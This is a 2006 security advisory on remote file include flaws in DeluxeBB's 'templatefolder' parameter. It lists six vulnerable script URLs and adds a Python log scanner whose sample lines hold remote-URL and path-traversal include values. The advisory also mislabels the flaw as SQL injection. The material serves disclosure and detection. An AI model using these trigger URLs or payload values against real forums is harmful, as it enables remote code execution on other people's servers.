2006-06-15 DeluxeBB <= 1.06 (templatefolder) Remote File Include Vulnerabilities
Rated as: Moderate Risk

Secunia Research has discovered some vulnerabilities in DeluxeBB,
which can be exploited by malicious people to conduct SQL injection
attacks and compromise a vulnerable system.

1) Input passed to the "templatefolder" parameter in various scripts
isn't properly verified before it is used to include files. This can
be exploited to include arbitrary files from external and local
resources.

Examples:
http://[host]/templates/deluxe/postreply.php?templatefolder=[file]
http://[host]/templates/deluxe/posting.php?templatefolder=[file]
http://[host]/templates/deluxe/pm/newpm.php?templatefolder=[file]
http://[host]/templates/default/postreply.php?templatefolder=[file]
http://[host]/templates/default/posting.php?templatefolder=[file]
http://[host]/templates/default/pm/newpm.php?templatefolder=[file]
securitydot.net - 2006-06-15
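
A log check built from the example URLs above, as an added example that is not part of the original advisory or of DeluxeBB's code: it flags requests that hand a "templatefolder" value to a script under /templates/, generalising from the six listed scripts to any PHP file there because the advisory says "various scripts". The combined log format, the three labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Any PHP file below /templates/ (the advisory lists six and says "various scripts").
AFFECTED = re.compile(r"/templates/.+\.php$")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(value):
    """Label a templatefolder value by the kind of resource it points at."""
    v = value.lower()
    if re.match(r"[a-z][a-z0-9+.-]*://", v) or v.startswith("//"):
        return "remote"  # URL-style value: external resource
    if ".." in v or v.startswith("/") or "\x00" in v:
        return "local"   # traversal, absolute path or NUL byte: local resource
    return "direct"      # any other client-supplied value, still worth a look


def scan(lines):
    """Return (line_no, path, label, value) for every flagged request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not AFFECTED.search(url.path):
            continue
        # parse_qs percent-decodes, so encoded values are classified as well.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("templatefolder", []):
            hits.append((no, url.path, classify(value), value))
    return hits


# Constructed sample log lines, not taken from a real server.
SAMPLE = [
    '192.0.2.10 - - [15/Jun/2006:10:00:01 +0000] "GET /templates/deluxe/postreply.php?templatefolder=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 512',
    '192.0.2.11 - - [15/Jun/2006:10:00:05 +0000] "GET /templates/default/pm/newpm.php?templatefolder=..%2F..%2Fexample HTTP/1.1" 200 128',
    '192.0.2.12 - - [15/Jun/2006:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 4096',
    '192.0.2.13 - - [15/Jun/2006:10:00:12 +0000] "GET /templates/default/posting.php?templatefolder=templates%2Fdefault HTTP/1.0" 200 90',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The check only sees values carried in the request URL; a parameter sent in a POST body does not appear in an access log.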
